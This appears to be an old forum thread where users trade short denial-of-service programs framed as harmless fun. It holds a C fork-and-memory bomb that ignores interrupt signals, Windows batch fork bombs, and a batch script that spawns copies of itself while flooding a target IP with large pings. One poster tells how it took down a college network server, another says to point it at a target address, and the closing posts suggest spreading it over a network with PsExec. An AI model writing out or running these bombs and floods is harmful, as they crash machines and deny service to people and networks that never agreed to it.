stupid but fun

a5an0

I have no clue why I never did this years ago. It's totally useless, but made me smile.

#include <stdio.h>

main()

{

while (1)

{

malloc(1024);

}

}

I dont know what compelled me to post this...

Oh yeah, bordom...

#include <stdio.h>

#include <string.h>

main()

{

while (1)

{

printf("And your point it and endless loop :/");

}

}

Sigh... kids these days...

#include <stdio.h>

#include <stdlib.h>

#include <signal.h>

#include <sys/types.h>

#include <unistd.h>

void main(void) {

pid_t pid;

signal(SIGPIPE,SIG_IGN);

signal(SIGINT,SIG_IGN);

signal(SIGHUP,SIG_IGN);

do {

malloc(1024);

pid = fork();

if (pid == 0) { // child

signal(SIGPIPE,SIG_IGN);

signal(SIGINT,SIG_IGN);

signal(SIGHUP,SIG_IGN);

}

} while (1);

}

Fork and memory bomb.

You'll be traced like *that* by the admin of the box you run this on, but it's fun to see the machine crumble and fall under the load.

You'll be traced like *that* by the admin of the box you run this on, but it's fun to see the machine crumble and fall under the load.

Oh absolutly. I'm not trying to like "p0st a 1337 hax0r toolz 2 cr4sh teh skool compys" It was just stupid but fun.

btw, Cooper, I bow to your coding abilities.

(not sarcastic, really)

• 2 weeks later...
Sigh... kids these days...

#include <stdio.h>

#include <stdlib.h>

#include <signal.h>

#include <sys/types.h>

#include <unistd.h>

void main(void) {

pid_t pid;

signal(SIGPIPE,SIG_IGN);

signal(SIGINT,SIG_IGN);

signal(SIGHUP,SIG_IGN);

do {

malloc(1024);

pid = fork();

if (pid == 0) { // child

signal(SIGPIPE,SIG_IGN);

signal(SIGINT,SIG_IGN);

signal(SIGHUP,SIG_IGN);

}

} while (1);

}

Fork and memory bomb.

now all you should do is tell some script kiddies that this will make them more "l33t" :D

a three line batch fork bomb

:die

start iexplore.exe

goto die

and for extra fun name it and call it in the loop so the damage grow exponentially as it goes through the loop

it wouldnt make any difference if you call it from within the loop or not.

start iexplore.exe

goto die

and for extra fun name it and call it in the loop so the damage grow exponentially as it goes through the loop

it wouldnt make any difference if you call it from within the loop or not.

yes it does every time you call it say using like nircmd it will produce a seperate command windows and that in turn will produce multiply others kind of like Fibonacci's sequence or a doubling pattern

i thought batch scripts didnt open other windows if you opened a btach script inside the script as all a batch script is is MS-DOS "commands" there for not needing it to open a window.

thought batch scripts didn't open other windows if you opened a batch script inside the script as all a batch script is is MS-DOS "commands" there for not needing it to open a window.

that's true but as a mentioned if you call it from another program such as nircmd it will launch nircmd and nircmd will begin executing the bat file and in turn the fork bomb will grow and not just repeat the same process inside it self. etc

in TAFE (government funded australian college) one day we were just talking crap and decided on DOS'ing the rooms server (this particular room didn't conform to TAFE's security and setup policy so it was a seperate network that belonged to the campus only). the server at the time did little else other than provide a few network shares (which weren't even used) and i believe also DHCP.

save as g.bat

:x

start g.bat

ping 192.168.0.1 -n 1 -l 65000 -w 100

goto x

this was the most simple yet was incredibly successful, although, the machine itself also crashed (well, it didn't really crash, but it was unrecoverable). it looked really awesome after a while because all the command prompts stopped drawing in their own window and just drew in the upper left hand corner.

it's worth noting: no permanent damage was done and noone was affected. we weren't doing it to be pricks.

boristsr which tafe you go to,

i would like to see this working and just seeing a wireshark network dump

there is nothing wrong with running this in a VM or even on your own internal network, just change the IP address to your target computer.

start iexplore.exe

goto die

is there anyway to make it go to a specified site???...

like google.com when ie starts up

yes there is just replace the line that calls internet exploiter with

"start iexplore google.com" you can change the site to anything but follow that syntax, (don't use it to scare people with goatse or any other shock sites though)

haha were such nerds, im not sure many "average" people would get ANY of this

are you talking about my reference to goatse and shock sites or my batch script??

now what would be really neat is if we could use psiexec(sp?) from sysinternals to run the :start, start start, goto start batch on other computers(as in networked ones.)

are you talking about the ability ti run it as a start up or as a distrubuted file over a network to run a large scale DOS (denial of service) like the previous batch file did using ping